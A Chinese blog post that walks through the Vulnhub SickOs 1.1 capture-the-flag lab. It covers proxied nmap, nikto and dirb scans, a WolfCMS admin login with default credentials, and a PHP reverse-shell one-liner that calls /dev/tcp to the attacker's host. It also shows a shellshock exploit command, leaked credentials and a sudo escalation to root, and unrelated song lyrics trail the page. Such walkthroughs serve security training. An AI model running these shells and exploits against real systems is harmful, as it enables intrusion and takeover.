欢迎来到夜梓月的小仓库|

夜梓月

园龄:2年11个月粉丝:15关注:10

Vulnhub_SickOs1.1_wp

前言

靶机下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z

主机探测

nmap -sn 192.168.20.0/24
image

192.168.20.148为靶机地址

详细信息扫描

nmap -A -p- 192.168.20.148

点击查看扫描结果
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nmap -A -p- 192.168.20.148
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-03 01:09 EDT
Nmap scan report for 192.168.20.148
Host is up (0.00033s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 093d29a0da4814c165141e6a6c370409 (DSA)
|   2048 8463e9a88e993348dbf6d581abf208ec (RSA)
|_  256 51f6eb09f6b3e691ae36370cc8ee3427 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:B6:E8:65 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.33 ms 192.168.20.148

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.91 seconds

通过扫描可以发现web站点做了代理,3128端口

漏洞扫描

nmap

nmap -p 8080,22,3128 --script=vuln 192.168.20.148
image

nikto

nikto -h 192.168.20.148 -useproxy http://192.168.20.148:3128

点击查看扫描结果
┌──(root㉿kali)-[/home/kali/Desktop]
└─# nikto -h 192.168.20.148 -useproxy http://192.168.20.148:3128
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.20.148
+ Target Hostname:    192.168.20.148
+ Target Port:        80
+ Proxy:              192.168.20.148:3128
+ Start Time:         2023-07-03 01:18:57 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ /: Retrieved via header: 1.0 localhost (squid/3.1.19).
+ /: Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Server may leak inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Fri Dec  4 19:35:02 2015. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ : Server banner changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19'.
+ /: Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_URL 0.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /index: Uncommon header 'tcn' found, with contents: list.
+ /index: Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. The following alternatives for 'index' were found: index.php. See: http://www.wisec.it/sectou.php?id=4698ebdc59d15,https://exchange.xforce.ibmcloud.com/vulnerabilities/8275
+ /cgi-bin/status: Uncommon header '93e4r0-cve-2014-6278' found, with contents: true.
+ /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. See: OSVDB-12184
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8912 requests: 2 error(s) and 20 item(s) reported on remote host
+ End Time:           2023-07-03 01:20:11 (GMT-4) (74 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

可以看到有一个shellshock漏洞,漏洞编号为cve-2014-6278,/cgi-bin/status路径也给了

web信息收集

先给浏览器添加代理不然访问不了
image
这里直接使用了插件,访问网站
image
报错了
但是看到了版本squid3.1.19,查询漏洞
image
没有可直接利用漏洞,百度发现squid为代理服务器

目录扫描

dirb

挂代理进行扫描
dirb http://192.168.20.148:8080/ -p http://192.168.20.148:3128/

image

dirb http://192.168.20.148 -p http://192.168.20.148:3128

点击查看扫描结果
┌──(root㉿kali)-[/home/kali/Desktop]
└─# dirb http://192.168.20.148 -p http://192.168.20.148:3128 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul  3 02:12:49 2023
URL_BASE: http://192.168.20.148/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.20.148:3128

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.20.148/ ----
+ http://192.168.20.148/cgi-bin/ (CODE:403|SIZE:290)                                                                                                        
+ http://192.168.20.148/connect (CODE:200|SIZE:109)                                                                                                         
+ http://192.168.20.148/index (CODE:200|SIZE:21)                                                                                                            
+ http://192.168.20.148/index.php (CODE:200|SIZE:21)                                                                                                        
+ http://192.168.20.148/robots (CODE:200|SIZE:45)                                                                                                           
+ http://192.168.20.148/robots.txt (CODE:200|SIZE:45)                                                                                                       
+ http://192.168.20.148/server-status (CODE:403|SIZE:295)                                                                                                   
                                                                                                                                                            
-----------------
END_TIME: Mon Jul  3 02:12:52 2023
DOWNLOADED: 4612 - FOUND: 7

访问robots.txt,访问发现提示wolfcms访问

image

image

继续扫描目录

点击查看扫描结果
┌──(root㉿kali)-[/home/kali/Desktop]
└─# dirb http://192.168.20.148/wolfcms -p http://192.168.20.148:3128

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jul  3 02:15:48 2023
URL_BASE: http://192.168.20.148/wolfcms/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
PROXY: http://192.168.20.148:3128

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.20.148/wolfcms/ ----
+ http://192.168.20.148/wolfcms/composer (CODE:200|SIZE:403)                                                                                                
+ http://192.168.20.148/wolfcms/config (CODE:200|SIZE:0)                                                                                                    
==> DIRECTORY: http://192.168.20.148/wolfcms/docs/                                                                                                          
+ http://192.168.20.148/wolfcms/favicon.ico (CODE:200|SIZE:894)                                                                                             
+ http://192.168.20.148/wolfcms/index (CODE:200|SIZE:3975)                                                                                                  
+ http://192.168.20.148/wolfcms/index.php (CODE:200|SIZE:3975)                                                                                              
==> DIRECTORY: http://192.168.20.148/wolfcms/public/                                                                                                        
+ http://192.168.20.148/wolfcms/robots (CODE:200|SIZE:0)                                                                                                    
+ http://192.168.20.148/wolfcms/robots.txt (CODE:200|SIZE:0)                                                                                                
                                                                                                                                                            
---- Entering directory: http://192.168.20.148/wolfcms/docs/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                            
---- Entering directory: http://192.168.20.148/wolfcms/public/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Jul  3 02:15:51 2023
DOWNLOADED: 4612 - FOUND: 7

image

百度一下wolf得后台地址

/wolfcms/?/admin/login

image

尝试弱口令
username:admin
password:admin
image

反弹shell

将命令写入,并保存文件
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.20.135/666 0&1'");?>
image
image

在Articles中找到触发点
image
点击即可触发命令执行

kali执行监听
nc -lvvp 443
image
拿到shell后提权与后续操作一样

文件上传漏洞

files中有上传点可以直接木马文件
image
上传后得文件在public文件夹下,提权操作一样

cve-2014-6278&提权

之前在nikto得扫描中发现了可以拿到shell得漏洞所以直接使用exp打一下
exp地址:https://www.exploit-db.com/exploits/34900
image

python3 sickosExp.py payload=reverse rhost=192.168.20.148 lhost=192.168.20.135 lport=555 proxy=192.168.20.148:3128 pages=/cgi-bin/status/
image

使用sudo -l查看当前用户所使用得文件
image
看不了,去网站目录看看都有什么
image
有一个cms,进去看看
image

查看配置文件
image

拿到了账号密码文件

点击查看账号密码
username:root
password:john@123
查看/etc/passwd文件查看用户 ![image](https://img2023.cnblogs.com/blog/2830174/202307/2830174-20230703133846695-823479791.png) 尝试ssh连接尝试root用户以及sickos ![image](https://img2023.cnblogs.com/blog/2830174/202307/2830174-20230703134002119-754416161.png) 成功通过sickos登录系统 sudo -l查看当前用户可使用命令 ![image](https://img2023.cnblogs.com/blog/2830174/202307/2830174-20230703134154082-1289692630.png)

没想到输入密码之后可以使用所有命令

sudo su root
image
查看flag
image

点击查看flag
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

目录扫描结果很慢,不过已经看到了有cms,准备尝试从cms拿到shell

本文作者:夜梓月

本文链接:https://www.cnblogs.com/zy4024/p/Vulnhub_SickOs1_1_wp.html

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   夜梓月  阅读(48)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起
  1. 1 404 not found REOL
404 not found - REOL
00:00 / 00:00
An audio error has occurred.

作曲 : Reol

作词 : Reol

fade away...do over again...

fade away...do over again...

歌い始めの一文字目 いつも迷ってる

歌い始めの一文字目 いつも迷ってる

どうせとりとめのないことだけど

伝わらなきゃもっと意味がない

どうしたってこんなに複雑なのに

どうしたってこんなに複雑なのに

噛み砕いてやらなきゃ伝わらない

ほら結局歌詞なんかどうだっていい

僕の音楽なんかこの世になくたっていいんだよ

Everybody don't know why.

Everybody don't know why.

Everybody don't know much.

僕は気にしない 君は気付かない

何処にももういないいない

Everybody don't know why.

Everybody don't know why.

Everybody don't know much.

忘れていく 忘れられていく

We don't know,We don't know.

目の前 広がる現実世界がまた歪んだ

目の前 広がる現実世界がまた歪んだ

何度リセットしても

僕は僕以外の誰かには生まれ変われない

「そんなの知ってるよ」

気になるあの子の噂話も

シニカル標的は次の速報

麻痺しちゃってるこっからエスケープ

麻痺しちゃってるこっからエスケープ

遠く遠くまで行けるよ

安定なんてない 不安定な世界

安定なんてない 不安定な世界

安定なんてない きっと明日には忘れるよ

fade away...do over again...

fade away...do over again...

そうだ世界はどこかがいつも嘘くさい

そうだ世界はどこかがいつも嘘くさい

綺麗事だけじゃ大事な人たちすら守れない

くだらない 僕らみんなどこか狂ってるみたい

本当のことなんか全部神様も知らない

Everybody don't know why.

Everybody don't know why.

Everybody don't know much.

僕は気にしない 君は気付かない

何処にももういないいない

Everybody don't know why.

Everybody don't know why.

Everybody don't know much.

忘れていく 忘れられていく

We don't know,We don't know.